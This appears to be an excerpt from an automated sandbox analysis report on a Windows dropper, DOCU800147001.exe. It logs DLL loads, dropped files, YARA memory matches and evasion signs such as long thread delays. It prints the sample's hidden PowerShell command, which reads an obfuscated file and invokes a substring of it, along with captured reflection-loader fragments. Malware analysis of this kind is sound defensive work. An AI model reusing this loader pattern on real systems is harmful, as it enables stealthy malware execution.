      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: crtdll.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: indows\System.Core.pdb@ source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbssio source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000008.00000002.2613773694.0000000005D6B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2547628074.000000000B13B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Vitiferous $Orinasal $Codi), (Microvillus @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Indbringendes = [AppDomain]::CurrentDomain.GetAssemblies()$global
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Countervailed)), $malakiass).DefineDynamicModule($Unflippantly, $false).DefineType($Underhammer, $Erhvervsregistrerede, [System.Multic
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074C9770 pushad ; iretd 2_2_074C9789
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074C0FC4 push es; iretd 2_2_074C0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074C61B9 push cs; ret 2_2_074C61BF
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6538Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3167Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405E7E FindFirstFileA,FindClose,0_2_00405E7E
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040543A
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: decouple.Chr.0.drBinary or memory string: arVMcI}1
      Source: msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
      Source: powershell.exe, 00000002.00000002.2527630104.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2527630104.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2527630104.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\DOCU800147001.exeAPI call chain: ExitProcess graph end nodegraph_0-3395
